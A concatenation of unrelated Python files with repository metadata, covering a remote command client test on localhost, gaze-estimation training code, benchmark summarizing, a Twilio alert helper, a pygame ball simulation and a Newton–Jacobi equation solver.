from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from bs4 import BeautifulSoup
import pandas as pd
import os
import glob
import shutil
import pandas as pd
from pathlib import Path
import re
import matplotlib.pyplot as plt
import numpy as np
import math
from datetime import datetime
from os import path
from docx import Document
from sklearn.linear_model import LinearRegression
#LDA Imports
import gensim
import nltk
from gensim.utils import simple_preprocess
from gensim.parsing.preprocessing import STOPWORDS
from nltk.stem import WordNetLemmatizer, SnowballStemmer
from nltk.stem.porter import *
import numpy as np
from gensim import corpora, models
from pprint import pprint
np.random.seed(2018)
#nltk.download('wordnet')
#plot
import matplotlib.pyplot as plt
import seaborn as sns
#Lexicon sentiment analysis
from afinn import Afinn
from textblob import TextBlob
import pandas as pd
from pprint import pprint
import pystan
from scipy.special import expit
from matplotlib import pyplot as plt
from numpy.random import normal, randint, binomial, choice
from numpy import percentile, concatenate, array, linspace, append
#%matplotlib inline
from sklearn.metrics import r2_score
x_axis = linspace(-10, 10, 100)
plt.plot(x_axis, expit(x_axis))
plt.xlabel('x')
plt.xlim([-6, 6])
plt.ylabel('logistic(x)')
plt.title('The logistic function', fontsize=15)
binary_irt_model = pystan.StanModel(file="binary_irt.stan")
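# Editor's note (hedged assumption): binary_irt.stan is not included in this
# snapshot. A minimal binary (Rasch-style) IRT model of the kind the line above
# expects might look like the sketch below; it is an illustration, not the
# original file.
BINARY_IRT_STAN_SKETCH = """
data {
  int<lower=1> J;                  // respondents
  int<lower=1> K;                  // items
  int<lower=1> N;                  // observations
  int<lower=1, upper=J> jj[N];     // respondent for observation n
  int<lower=1, upper=K> kk[N];     // item for observation n
  int<lower=0, upper=1> y[N];      // binary response
}
parameters {
  vector[J] alpha;                 // ability
  vector[K] beta;                  // difficulty
}
model {
  alpha ~ normal(0, 1);
  beta ~ normal(0, 1);
  y ~ bernoulli_logit(alpha[jj] - beta[kk]);
}
"""
# e.g. pystan.StanModel(model_code=BINARY_IRT_STAN_SKETCH)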
|
[
"[email protected]"
] | |
7ccca3ee25e9eb35c488266d7448ee7645100a6d
|
9ae680db168db40ae8feae0dc9cb42dacabbd012
|
/functest.py
|
9aa06fc03d61aa5f6d9c42e005721d6c117b51c7
|
[] |
no_license
|
tonysimpson/pyras
|
5ed4ec212b916ecb5eb3b9db8e05b43d585bb8a8
|
defbddffa04aa50c108138a63c3dd76957615994
|
refs/heads/master
| 2021-01-18T13:54:55.572472 | 2014-06-13T09:12:53 | 2014-06-13T09:12:53 | 5,888,372 | 1 | 0 | null | 2014-06-13T09:10:21 | 2012-09-20T15:07:52 |
Python
|
UTF-8
|
Python
| false | false | 1,078 |
py
|
# use ipython -i functest.py
import pyras
client = pyras.RemoteCommandClient('127.0.0.1')
print client.info()
client.register('echo "Hello"')
print client.info()
client.start(1)
client.register('while true; do echo "oh no!"; done')
print client.info()
client.start(2)
print client.info()
client.stop(2)
client.run('echo "hello"')
client.unregister(2)
print client.info()
client.register('echo "1"', 'group1')
client.register('echo "2"', 'group1')
client.register('echo "3"', 'group1')
client.register('echo "4"', 'group1')
client.register('echo "5"', 'group1')
client.register('echo "6"', 'group1')
client.register('echo "7"', 'group1')
print client.info()
client.start_group('group1')
client.register('echo "8"', 'group1')
client.register('echo "9"', 'group1')
client.stop_group('group1')
client.start_group('group1')
print client.info()
print client.read('README.md', 0, 20)
print client.read_end('README.md', 20)
cid = client.register(r'for i in `seq 4`; do (while true; do echo $i; done &) ; done')
client.start(cid)
print client.info()
client.stop(cid)
print client.info()
|
[
"[email protected]"
] | |
aa2900526f8aa579b7ea48f1111b139ef3a08d84
|
ea96439b3fe8745e06875aa8913d487c2715d2fc
|
/NeuroAnalysisTools/scripts/analysis_database/0150_plot_ori_vs_rf_axis_DS.py
|
bb4e8680d69bc7cc65c1d6de2cc656954ee14eb7
|
[] |
no_license
|
zhuangjun1981/NeuroAnalysisTools
|
00561ddd1ee8339b5c2c7ab5d7318ac207460c5c
|
0c7acdb745ef93e009ec538af11252e743f9d430
|
refs/heads/master
| 2022-07-18T05:55:22.200409 | 2022-07-07T23:01:29 | 2022-07-07T23:01:29 | 226,148,154 | 14 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,877 |
py
|
import os
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import NeuroAnalysisTools.SingleCellAnalysis as sca
import scipy.stats as stats
import h5py
# df_path = r"G:\bulk_LGN_database\dataframe_190530171338.csv"
# rf_maps_folder = r"intermediate_results\rf_maps_dataframes_190529210731"
df_path = r"G:\bulk_LGN_database\dataframe_190530171338_axon_AllStimuli_DistanceThr_1.30.csv"
rf_maps_folder = r"G:\bulk_LGN_database\intermediate_results" \
r"\rf_maps_dataframe_190530171338_axon_AllStimuli_DistanceThr_1.30"
depths = [50, 100, 150, 200, 250, 300, 350, 400,]
mouse_ids = ['M360495', 'M376019', 'M386444', 'M426525', 'M439939', 'M439943']
# mouse_ids = ['M439939']
dire_type = 'peak_dire' # 'vs_dire' or 'peak_dire'
response_dir = 'pos'
response_type = 'dff'
post_process_type = 'ele' # 'raw', 'ele' or 'rec'
skew_thr = 0.6
dgc_peak_z_thr = 3.
dgc_p_anova_thr = 0.01
dsi_type = 'gdsi'
dsi_thr = 0.5
osi_type = 'gosi'
osi_thr = 1. / 3.
ellipse_aspect_thr = 1.0
curr_folder = os.path.dirname(os.path.realpath(__file__))
os.chdir(curr_folder)
if dire_type == 'peak_dire' and (post_process_type == 'ele' or post_process_type == 'rec'):
dire_pp = 'raw'
else:
dire_pp = post_process_type
print('loading csv file: {}'.format(df_path))
df = pd.read_csv(df_path)
print('csv file loaded.')
df = df[(df['mouse_id'].isin(mouse_ids)) & \
(df['skew_fil'] >= skew_thr) & \
(df['dgc_{}_peak_z'.format(response_dir)] >= dgc_peak_z_thr) & \
(df['dgc_p_anova_{}'.format(response_type)] <= dgc_p_anova_thr) & \
(np.isfinite(df['rf_{}_on_peak_z'.format(response_dir)]))]
dsdf = df[(df['dgc_{}_{}_{}_{}'.format(response_dir, dsi_type, post_process_type, response_type)] >= dsi_thr)]
ds_diff_onoff = []
ds_diff_on = []
ds_diff_off = []
for roi_i, roi_row in dsdf.iterrows():
date = int(roi_row['date'])
mid = roi_row['mouse_id']
plane_n = roi_row['plane_n']
roi_n = roi_row['roi_n']
map_fn = '{}_{}_{}_{}'.format(date, mid, plane_n, response_dir)
map_f = h5py.File(os.path.join(rf_maps_folder, map_fn + '.hdf5'), 'r')
on_grp = map_f['{}_ON'.format(map_fn)]
off_grp = map_f['{}_OFF'.format(map_fn)]
dire = roi_row['dgc_{}_{}_{}_{}'.format(response_dir, dire_type, dire_pp, response_type)]
ori = sca.dire2ori(dire)
if roi_n in on_grp.keys() and roi_n in off_grp.keys():
rf_on = sca.SpatialReceptiveField.from_h5_group(on_grp[roi_n])
rf_off = sca.SpatialReceptiveField.from_h5_group(off_grp[roi_n])
c_alt_on, c_azi_on = rf_on.get_weighted_rf_center()
c_alt_off, c_azi_off = rf_off.get_weighted_rf_center()
onoff_ang = np.arctan((c_alt_on - c_alt_off) / (c_azi_on - c_azi_off))
onoff_ang = onoff_ang * 180. / np.pi
onoff_ang = sca.dire2ori(onoff_ang)
curr_diff = abs(onoff_ang - ori)
if curr_diff > 90.:
curr_diff = 180 - curr_diff
ds_diff_onoff.append(curr_diff)
elif roi_n in on_grp.keys():
rf_on = sca.SpatialReceptiveField.from_h5_group(on_grp[roi_n])
ell_on = rf_on.ellipse_fitting(is_plot=False)
if ell_on is not None and ell_on.get_aspect_ratio() >= ellipse_aspect_thr:
curr_diff = abs(ell_on.angle - ori)
if curr_diff > 90.:
curr_diff = 180 - curr_diff
ds_diff_on.append(curr_diff)
elif roi_n in off_grp.keys():
rf_off = sca.SpatialReceptiveField.from_h5_group(off_grp[roi_n])
ell_off = rf_off.ellipse_fitting(is_plot=False)
if ell_off is not None and ell_off.get_aspect_ratio() >= ellipse_aspect_thr:
curr_diff = abs(ell_off.angle - ori)
if curr_diff > 90.:
curr_diff = 180 - curr_diff
ds_diff_off.append(curr_diff)
print('\nDirection Selective ROIs:')
print('\tWith ONOFF receptive fields:')
print('\t\tn={}'.format(len(ds_diff_onoff)))
print('\t\torie difference predicted vs. measured, mean={}'.format(np.mean(ds_diff_onoff)))
print('\t\torie difference predicted vs. measured, std={}'.format(np.std(ds_diff_onoff)))
chisq_ds_onoff, p_ds_onoff = stats.chisquare(np.histogram(ds_diff_onoff, range=[0., 90.], bins=20)[0])
print('\t\tagainst uniform distribution: chi-squared={}, p={}'.format(chisq_ds_onoff, p_ds_onoff))
print('\tWith only ON receptive fields:')
print('\t\tn={}'.format(len(ds_diff_on)))
print('\t\torie difference predicted vs. measured, mean={}'.format(np.mean(ds_diff_on)))
print('\t\torie difference predicted vs. measured, std={}'.format(np.std(ds_diff_on)))
chisq_ds_on, p_ds_on = stats.chisquare(np.histogram(ds_diff_on, range=[0., 90.], bins=20)[0])
print('\t\tagainst uniform distribution: chi-squared={}, p={}'.format(chisq_ds_on, p_ds_on))
print('\tWith only OFF receptive fields:')
print('\t\tn={}'.format(len(ds_diff_off)))
print('\t\torie difference predicted vs. measured, mean={}'.format(np.mean(ds_diff_off)))
print('\t\torie difference predicted vs. measured, std={}'.format(np.std(ds_diff_off)))
chisq_ds_off, p_ds_off = stats.chisquare(np.histogram(ds_diff_off, range=[0., 90.], bins=20)[0])
print('\t\tagainst uniform distribution: chi-squared={}, p={}'.format(chisq_ds_off, p_ds_off))
ds_diff_all = ds_diff_onoff + ds_diff_on + ds_diff_off
print('\tWith all receptive fields:')
print('\t\tn={}'.format(len(ds_diff_all)))
print('\t\torie difference predicted vs. measured, mean={}'.format(np.mean(ds_diff_all)))
print('\t\torie difference predicted vs. measured, std={}'.format(np.std(ds_diff_all)))
chisq_ds_all, p_ds_all = stats.chisquare(np.histogram(ds_diff_all, range=[0., 90.], bins=20)[0])
print('\t\tagainst uniform distribution: chi-squared={}, p={}'.format(chisq_ds_all, p_ds_all))
plt.hist([ds_diff_onoff, ds_diff_on, ds_diff_off], range=[0, 90], bins=20, stacked=True,
color=['purple', 'r', 'b'], ec='none', alpha=0.5)
plt.show()
|
[
"[email protected]"
] | |
de1e37fad3f75f1bdda9b267bc475dc95f331d6c
|
1ebdd01866600631e5db0abba10aab4c66abd4b7
|
/bench/summarize.py
|
45180f1d8cdc521bee6afedcd1a1493151e068df
|
[
"BSD-3-Clause"
] |
permissive
|
UCSD-Modern-Storage-Systems/MSS-KV-lab
|
40abf3b0b14c5145e16df2f084f52b902b9062aa
|
64f3f7bb17f45eedca24615cb9c4965e1cc4b7a2
|
refs/heads/master
| 2020-08-17T11:42:35.343853 | 2019-11-26T17:05:51 | 2019-11-26T17:05:51 | 215,661,403 | 3 | 3 | null | 2019-11-22T05:36:13 | 2019-10-16T23:18:40 |
C++
|
UTF-8
|
Python
| false | false | 1,454 |
py
|
import sys
benchmarks = [
('fillseq', '100'),
('fillseq', '1024'),
('fillrandom', '100'),
('fillrandom', '1024'),
('overwrite', '100'),
('overwrite', '1024'),
('readseq', '100'),
('readseq', '1024'),
('readrandom', '100'),
('readrandom', '1024'),
('deleteseq', '100'),
('deleteseq', '1024'),
('deleterandom', '100'),
('deleterandom', '1024'),
]
if __name__ == "__main__":
if len(sys.argv) != 2:
print "python %s output_file" % sys.argv[0]
sys.exit(1)
outfile_name = sys.argv[1]
# fillrandom : 15.140 micros/op 66048 ops/sec; 65.5 MB/s
# fillrandom : 15.140 micros/op 66051 ops/sec; 65.5 MB/s
# fillrandom : 15.100 micros/op 66225 ops/sec; 65.7 MB/s
# fillrandom : 15.047 micros/op 66460 ops/sec; 65.9 MB/s
files = []
tputs = []
for name, val_size in benchmarks:
file_name = '%s_%s.txt' % (name, val_size)
files.append(file_name)
tput = 0
try:
with open(file_name) as f:
lines = f.readlines()[-4:]
for line in lines:
words = line.strip().split()
bench_name = words[0]
assert bench_name == name
tput += int(words[4])
except:
tput = 0
tputs.append(tput)
files.insert(0, 'AverageThroughput')
print tputs
mean = int(sum(tputs) / len(tputs))
print "avg: %d ops/sec" % mean
tputs.insert(0, mean)
tputs = map(lambda x: str(x), tputs)
with open(outfile_name, 'w') as f:
f.write("%s\n" % ",".join(files))
f.write("%s\n" % ",".join(tputs))
|
[
"[email protected]"
] | |
3e8e2a961f16337985eed5135e0657e6cf615172
|
ccc688aeae19f19e2167c3e730025a1b43b7f717
|
/gazefollowing/training/train_gazenet.py
|
618fed1be3889333ff7c1655a6b9968c0a97ea7b
|
[] |
no_license
|
PrimeshShamilka/GOO
|
32cddb1c3b4ad83ec901f1e61e0defe00205991f
|
6a374cceed59cb6925099382f3f56aef52820d07
|
refs/heads/main
| 2023-09-01T05:47:59.185702 | 2021-10-13T19:07:01 | 2021-10-13T19:07:01 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,198 |
py
|
import torch
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
import numpy as np
import cv2
from sklearn.metrics import roc_auc_score
from tqdm import tqdm
def F_loss(direction, predict_heatmap, eye_position, gt_position, gt_heatmap):
# point loss
heatmap_loss = nn.BCELoss()(predict_heatmap, gt_heatmap)
# angle loss
gt_direction = gt_position - eye_position
middle_angle_loss = torch.mean(1 - nn.CosineSimilarity()(direction, gt_direction))
return heatmap_loss, middle_angle_loss
class GazeOptimizer():
def __init__(self, net, initial_lr):
self.optimizer_s1 = optim.Adam([{'params': net.module.face_net.parameters(),
'initial_lr': initial_lr},
{'params': net.module.face_process.parameters(),
'initial_lr': initial_lr},
{'params': net.module.eye_position_transform.parameters(),
'initial_lr': initial_lr},
{'params': net.module.fusion.parameters(),
'initial_lr': initial_lr}],
lr=initial_lr, weight_decay=0.0001)
self.optimizer_s2 = optim.Adam([{'params': net.module.fpn_net.parameters(),
'initial_lr': initial_lr}],
lr=initial_lr, weight_decay=0.0001)
self.optimizer_s3 = optim.Adam([{'params': net.parameters(), 'initial_lr': initial_lr}],
lr=initial_lr*0.1, weight_decay=0.0001)
self.lr_scheduler_s1 = optim.lr_scheduler.StepLR(self.optimizer_s1, step_size=5, gamma=0.1, last_epoch=-1)
self.lr_scheduler_s2 = optim.lr_scheduler.StepLR(self.optimizer_s2, step_size=5, gamma=0.1, last_epoch=-1)
self.lr_scheduler_s3 = optim.lr_scheduler.StepLR(self.optimizer_s3, step_size=5, gamma=0.1, last_epoch=-1)
self.optimizer = self.optimizer_s1
def getOptimizer(self, epoch):
if epoch < 7:
lr_scheduler = self.lr_scheduler_s1
self.optimizer = self.optimizer_s1
elif epoch < 15:
lr_scheduler = self.lr_scheduler_s2
self.optimizer = self.optimizer_s2
else:
lr_scheduler = self.lr_scheduler_s3
self.optimizer = self.optimizer_s3
lr_scheduler.step()
return self.optimizer
def train(net, train_dataloader, optimizer, epoch, logger):
running_loss = []
for i, data in tqdm(enumerate(train_dataloader), total=len(train_dataloader)):
image, face_image, gaze_field, eye_position, gt_position, gt_heatmap = \
data['image'], data['face_image'], data['gaze_field'], data['eye_position'], data['gt_position'], data['gt_heatmap']
image, face_image, gaze_field, eye_position, gt_position, gt_heatmap = \
map(lambda x: Variable(x.cuda()), [image, face_image, gaze_field, eye_position, gt_position, gt_heatmap])
optimizer.zero_grad()
direction, predict_heatmap = net([image, face_image, gaze_field, eye_position])
heatmap_loss, m_angle_loss = \
F_loss(direction, predict_heatmap, eye_position, gt_position, gt_heatmap)
if epoch == 0:
loss = m_angle_loss
elif epoch >= 7 and epoch <= 14:
loss = heatmap_loss
else:
loss = m_angle_loss + heatmap_loss
loss.backward()
optimizer.step()
running_loss.append([heatmap_loss.item(),
m_angle_loss.item(), loss.item()])
if i % 100 == 99:
logger.info('%s'%(str(np.mean(running_loss, axis=0))))
running_loss = []
return running_loss
def test(net, test_data_loader, logger, save_output=False):
net.eval()
total_loss = []
total_error = []
info_list = []
heatmaps = []
all_gazepoints = []
all_predmap = []
all_gtmap = []
with torch.no_grad():
for data in tqdm(test_data_loader, total=len(test_data_loader)):
image, face_image, gaze_field, eye_position, gt_position, gt_heatmap = \
data['image'], data['face_image'], data['gaze_field'], data['eye_position'], data['gt_position'], data['gt_heatmap']
image, face_image, gaze_field, eye_position, gt_position, gt_heatmap = \
map(lambda x: Variable(x.cuda()), [image, face_image, gaze_field, eye_position, gt_position, gt_heatmap])
direction, predict_heatmap = net([image, face_image, gaze_field, eye_position])
#curr_batch_size = predict_heatmap.shape[0]
#predict_heatmap = torch.rand(curr_batch_size, 1, 56, 56).cuda()
heatmap_loss, m_angle_loss = \
F_loss(direction, predict_heatmap, eye_position, gt_position, gt_heatmap)
loss = heatmap_loss + m_angle_loss
total_loss.append([heatmap_loss.item(),
m_angle_loss.item(), loss.item()])
#logger.info('loss: %.5lf, %.5lf, %.5lf'%( \
# heatmap_loss.item(), m_angle_loss.item(), loss.item()))
middle_output = direction.cpu().data.numpy()
final_output = predict_heatmap.cpu().data.numpy()
target = gt_position.cpu().data.numpy()
eye_position = eye_position.cpu().data.numpy()
predict_heatmap = predict_heatmap.cpu().data.numpy()
for m_direction, f_point, gt_point, eye_point, heatmap in \
zip(middle_output, final_output, target, eye_position, predict_heatmap):
f_point = f_point.reshape([224 // 4, 224 // 4])
heatmaps.append(f_point)
h_index, w_index = np.unravel_index(f_point.argmax(), f_point.shape)
f_point = np.array([w_index / 56., h_index / 56.])
f_error = f_point - gt_point
f_dist = np.sqrt(f_error[0] ** 2 + f_error[1] ** 2)
# angle
f_direction = f_point - eye_point
gt_direction = gt_point - eye_point
norm_m = (m_direction[0] **2 + m_direction[1] ** 2 ) ** 0.5
norm_f = (f_direction[0] **2 + f_direction[1] ** 2 ) ** 0.5
norm_gt = (gt_direction[0] **2 + gt_direction[1] ** 2 ) ** 0.5
m_cos_sim = (m_direction[0]*gt_direction[0] + m_direction[1]*gt_direction[1]) / \
(norm_gt * norm_m + 1e-6)
m_cos_sim = np.maximum(np.minimum(m_cos_sim, 1.0), -1.0)
m_angle = np.arccos(m_cos_sim) * 180 / np.pi
f_cos_sim = (f_direction[0]*gt_direction[0] + f_direction[1]*gt_direction[1]) / \
(norm_gt * norm_f + 1e-6)
f_cos_sim = np.maximum(np.minimum(f_cos_sim, 1.0), -1.0)
f_angle = np.arccos(f_cos_sim) * 180 / np.pi
#AUC
heatmap = np.squeeze(heatmap)
heatmap = cv2.resize(heatmap, (5, 5))
gt_heatmap = np.zeros((5, 5))
x, y = list(map(int, gt_point * 5))
gt_heatmap[y, x] = 1.0
all_gazepoints.append(f_point)
all_predmap.append(heatmap)
all_gtmap.append(gt_heatmap)
#score = roc_auc_score(gt_heatmap.reshape([-1]).astype(np.int32), heatmap.reshape([-1]))
total_error.append([f_dist, f_angle])
info_list.append(list(f_point))
info_list = np.array(info_list)
l2, ang = np.mean(np.array(total_error), axis=0)
all_gazepoints = np.vstack(all_gazepoints)
all_predmap = np.stack(all_predmap).reshape([-1])
all_gtmap = np.stack(all_gtmap).reshape([-1])
auc = roc_auc_score(all_gtmap, all_predmap)
if save_output:
np.savez('predictions.npz', gazepoints=all_gazepoints)
#logger.info('average loss : %s'%str(np.mean(np.array(total_loss), axis=0)))
logger.info('average error: %s'%str([auc, l2, ang]))
net.train()
return [auc, l2, ang]
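# Hedged sanity check (editor's addition): exercise F_loss with random tensors
# of the shapes this script uses (56x56 heatmaps, 2-D eye/gaze positions).
if __name__ == '__main__':
    _direction = torch.randn(4, 2)
    _pred_heatmap = torch.sigmoid(torch.randn(4, 1, 56, 56))
    _gt_heatmap = torch.rand(4, 1, 56, 56)
    _eye, _gt = torch.rand(4, 2), torch.rand(4, 2)
    _h_loss, _a_loss = F_loss(_direction, _pred_heatmap, _eye, _gt, _gt_heatmap)
    print(_h_loss.item(), _a_loss.item())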
|
[
"[email protected]"
] | |
8577baebc54712a01aff72b610290ff2ca7776d9
|
cd8d6d20351b86b6e2b28500467d8999f9fa4439
|
/src/image_scraping_step_3/alert_program.py
|
83a08327cd98f3738516d57a4b84849217aa1d3c
|
[
"MIT"
] |
permissive
|
mhmulder/image_captioning
|
bf706f574ba12e3daa5b9b8bfdf0d733233abb7d
|
ed22a3b4948d1ce5e8db580433d58945a2a5f010
|
refs/heads/master
| 2021-09-05T19:46:12.694992 | 2018-01-30T16:46:29 | 2018-01-30T16:46:29 | 115,772,652 | 1 | 1 | null | 2018-01-30T16:46:30 | 2017-12-30T04:07:16 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 794 |
py
|
from twilio.rest import Client
import os
accountSID = os.environ["TWILIO_SID"]
authToken = os.environ["TWILIO_TOKEN"]
myTwilioNumber = os.environ["TWILIO_NUMBER"]
myCellPhone = os.environ["my_number"]
def send_end_alert(project_name, body='Default', accountSID=accountSID,
                   authToken=authToken, myTwilioNumber=myTwilioNumber,
                   myCellPhone=myCellPhone):
    if body == 'Default':
        body = 'Your project, {}, has completed!'.format(project_name)
twilioCli = Client(accountSID, authToken)
message = twilioCli.messages.create(body=body,
from_=myTwilioNumber,
to=myCellPhone)
return message
if __name__ == '__main__':
send_end_alert('test')
|
[
"[email protected]"
] | |
9579a5ea7fad7a79327c9acb00f549bdbc62ea29
|
6b9ee9e92d0c0075b7098f43c7b0cd3cd49b4f63
|
/ball.py
|
ab81587f8faf0ae9f6f2ccec3ddecc81faaef82e
|
[] |
no_license
|
dohyunmoo/Bouncing-Balls
|
429c5f9c6adf3afbb958ce858f962f221c8c9f35
|
5dc081a7a6b54bf18d360a984f9c30f9141d2829
|
refs/heads/main
| 2023-02-17T21:52:48.607727 | 2021-01-08T13:18:42 | 2021-01-08T13:18:42 | 327,908,171 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,177 |
py
|
import pygame
import random
pygame.init()
class Ball:
def __init__(self, radius, color, startingx, startingy, friction, weight):
self.radius = radius
self.diameter = radius*2
self.color = color
self.x = startingx
self.y = startingy
self.vx = friction
self.vy = weight
self.yspeed = 0
self.xspeed = 0
def draw(self, win, width, height):
minimumx = self.radius
maximumx = width - self.radius
minimumy = self.radius
maximumy = height - self.radius
if self.xspeed >= 0 and self.xspeed != 0:
self.xspeed -= self.vx
elif self.xspeed < 0 and self.xspeed != 0:
self.xspeed += self.vx
self.x += self.xspeed
self.yspeed += self.vy
self.y += self.yspeed
self.collision(width, height, minimumx, maximumx, minimumy, maximumy)
if self.x >= maximumx:
self.x = maximumx
if self.y >= maximumy:
self.y = maximumy
pygame.draw.circle(win, self.color, (self.x, self.y), self.radius)
def collision(self, width, height, xmin, xmax, ymin, ymax):
if self.x <= xmin or self.x >= xmax:
self.xspeed *= -1
if self.xspeed >= 0 and self.xspeed != 0:
self.xspeed -= self.vx
elif self.xspeed < 0 and self.xspeed != 0:
self.xspeed += self.vx
self.x += self.xspeed
elif self.y >= ymax:
self.yspeed *= -1
self.yspeed += self.vy
self.y += self.yspeed
def addForce(self, pos):
if (pos[0] <= self.x + self.radius and pos[0] >= self.x - self.radius) and (pos[1] <= self.y + self.radius and pos[1] >= self.y - self.radius):
if self.xspeed <= 0:
self.xspeed -= random.randint(5,10)
else:
self.xspeed += random.randint(5,10)
if self.yspeed <= 0:
self.yspeed -= random.randint(10,20)
else:
self.yspeed += random.randint(10,20)
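# Hedged usage sketch (editor's addition): a minimal window driving Ball; the
# window size and Ball parameters below are assumptions, not from this repo.
def _demo():
    width, height = 400, 300
    win = pygame.display.set_mode((width, height))
    ball = Ball(radius=15, color=(255, 0, 0), startingx=200, startingy=50,
                friction=0.1, weight=1)
    clock = pygame.time.Clock()
    running = True
    while running:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                running = False
            elif event.type == pygame.MOUSEBUTTONDOWN:
                ball.addForce(pygame.mouse.get_pos())
        win.fill((0, 0, 0))
        ball.draw(win, width, height)
        pygame.display.update()
        clock.tick(60)
    pygame.quit()
# _demo()  # uncomment to run interactively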
|
[
"[email protected]"
] | |
23880f4bb3b0fbc30871786ed1a37bc44186075e
|
19651a8d1eabe37f74dc7562c2bf3b5dcb990b32
|
/newton-jakobi.py
|
70c4afc5f7fadfbe2a2583978042a64cfb2769b3
|
[] |
no_license
|
damoklov/numeric-methods
|
b9f7571244da8da65b6fed31747c45eaefa7973d
|
3b9cde027ed1330862487f8b9eb72ddc66a95b25
|
refs/heads/master
| 2023-02-11T19:15:29.305119 | 2020-12-28T12:22:25 | 2020-12-28T12:22:25 | 311,182,365 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,754 |
py
|
def f1(x1, x2):
return x2**2 - x1**2 - 0.1 - x1
def f2(x1, x2):
return 0.1 - 2*x1*x2 - x2
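# Hedged cross-check (editor's addition): solve the same 2x2 system with
# scipy.optimize.fsolve and print the residuals; handy for validating the
# hand-rolled Newton iteration defined below.
def _scipy_cross_check():
    from scipy.optimize import fsolve
    root = fsolve(lambda v: [f1(v[0], v[1]), f2(v[0], v[1])], [0.5, 0.5])
    print(root, f1(root[0], root[1]), f2(root[0], root[1]))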
def newton_jakobi():
eps = 0.001
argument_vector = [0.5, 0.5]
prev_vector = [0, 0]
identity_matrix = initialize_matrix()
f = [0, 0]
while True:
f[0] = f1(argument_vector[0], argument_vector[1])
f[1] = f2(argument_vector[0], argument_vector[1])
jacobian = build_jacobian(argument_vector, f)
reversed_jacobian = reverse_matrix(jacobian, identity_matrix)
for i in range(len(f)):
x_old = argument_vector[i]
prev_vector[i] = x_old
increment = 0.0
for j in range(2):
                increment += reversed_jacobian[i][j] * f[j]
argument_vector[i] = prev_vector[i] - increment
if abs((argument_vector[0] - prev_vector[0])/argument_vector[0]) < eps:
break
elif abs((argument_vector[1] - prev_vector[1])/argument_vector[1]) < eps:
break
print(argument_vector)
print(f1(argument_vector[0], argument_vector[1]))
print(f2(argument_vector[0], argument_vector[1]))
def build_jacobian(argument_vector, function_vector):
h = 1
args = [0, 0]
f = [0, 0]
jacobian = [[0, 0], [0, 0]]
for i in range(2):
for j in range(2):
for k in range(2):
args[k] = argument_vector[k]
args[j] = argument_vector[j] + h
f[0] = f1(args[0], args[1])
f[1] = f2(args[0], args[1])
jacobian[i][j] = (f[i] - function_vector[i])/h
return jacobian
def initialize_matrix():
matrix = [[0 for _ in range(4)] for _ in range(4)]
for i in range(len(matrix)):
for j in range(len(matrix[i])):
if i == j:
matrix[i][j] = 1
else:
matrix[i][j] = 0
return matrix
def reverse_matrix(matrix, identity_matrix):
size = len(matrix)
reversed_matrix = [[0 for _ in range(size)] for _ in range(size)]
for i in range(size):
solution = roots(i, matrix, identity_matrix)
for j in range(len(solution)):
reversed_matrix[j][i] = solution[j]
return reversed_matrix
def roots(counter, matrix, identity_matrix):
size = len(matrix)
coefficients = [[0 for _ in range(size)] for _ in range(size)]
free_members = [0 for _ in range(size)]
argument_positions = [0 for _ in range(size)]
result_coefficients = [[0 for _ in range(size)] for _ in range(size)]
result_free_members = [0 for _ in range(size)]
free_members, coefficients, argument_positions = initialize_system(
free_members, identity_matrix, counter, argument_positions, coefficients, matrix)
result_free_members, free_members, coefficients, result_coefficients = direct_way(
result_free_members, free_members, coefficients, result_coefficients, argument_positions, size)
result = reverse_way(result_free_members, result_coefficients)
result, argument_positions = order_vector(result, argument_positions)
return result
def order_vector(result, argument_positions):
for i in range(len(result)):
        if argument_positions[i] != i:
arg = argument_positions[i]
value = result[i]
result[i] = result[arg]
result[arg] = value
argument_positions[i] = argument_positions[arg]
argument_positions[arg] = arg
return result, argument_positions
def direct_way(result_free_members, free_members, coefficients, result_coefficients, argument_positions, size):
for i in range(size):
coefficients, free_members, argument_positions, result_coefficients = optimize_matrix(
i, coefficients, free_members, argument_positions, result_coefficients, size)
result_free_members[i] = free_members[i] / coefficients[i][i]
for j in range(i + 1, size):
free_members[j] = free_members[j] - coefficients[j][i] * result_free_members[i]
for k in range(i + 1, size):
result_coefficients[i][k] = coefficients[i][k] / coefficients[i][i]
coefficients[j][k] = coefficients[j][k] - coefficients[j][i] * result_coefficients[i][k]
return result_free_members, free_members, coefficients, result_coefficients
def reverse_way(result_free_members, result_coefficients):
size = len(result_free_members)
solution = [0 for _ in range(size)]
for i in range(size -1, -1, -1):
sum = 0.0
for j in range(i + 1, size):
sum += result_coefficients[i][j] * solution[j]
solution[i] = result_free_members[i] - sum
return solution
def initialize_system(free_members, identity_matrix, counter, argument_positions, coefficients, matrix):
size = len(matrix)
for i in range(size):
free_members[i] = identity_matrix[i][counter]
argument_positions[i] = i
for j in range(size):
coefficients[i][j] = matrix[i][j]
return free_members, coefficients, argument_positions
def optimize_matrix(r, coefficients, free_members, argument_positions, result_coefficients, size):
max_coefficient = coefficients[r][r]
max_row = r
max_col = r
for i in range(size):
for j in range(size):
if max_coefficient < abs(coefficients[i][j]):
max_coefficient = abs(coefficients[i][j])
max_row = i
max_col = j
free_members = swap_array_values(free_members, r, max_row)
for l in range(size):
coefficients = swap_matrix_values_row(coefficients, r, max_row, l)
argument_positions = swap_argument_positions(argument_positions, r, max_col)
for m in range(size):
if m < r:
result_coefficients = swap_matrix_values_columns(result_coefficients, m, r, max_col)
else:
coefficients = swap_matrix_values_columns(coefficients, m, r, max_col)
return coefficients, free_members, argument_positions, result_coefficients
def swap_matrix_values_columns(matrix, r, fc, sc):
temp = matrix[r][fc]
matrix[r][fc] = matrix[r][sc]
matrix[r][sc] = temp
return matrix
def swap_argument_positions(argument_positions, r, max_col):
temp = argument_positions[r]
argument_positions[r] = argument_positions[max_col]
argument_positions[max_col] = temp
return argument_positions
def swap_array_values(free_members, fc, sc):
temp = free_members[fc]
free_members[fc] = free_members[sc]
free_members[sc] = temp
return free_members
def swap_matrix_values_row(matrix, fc, sc, col):
temp = matrix[fc][col]
matrix[fc][col] = matrix[sc][col]
matrix[sc][col] = temp
return matrix
if __name__ == '__main__':
newton_jakobi()
|
[
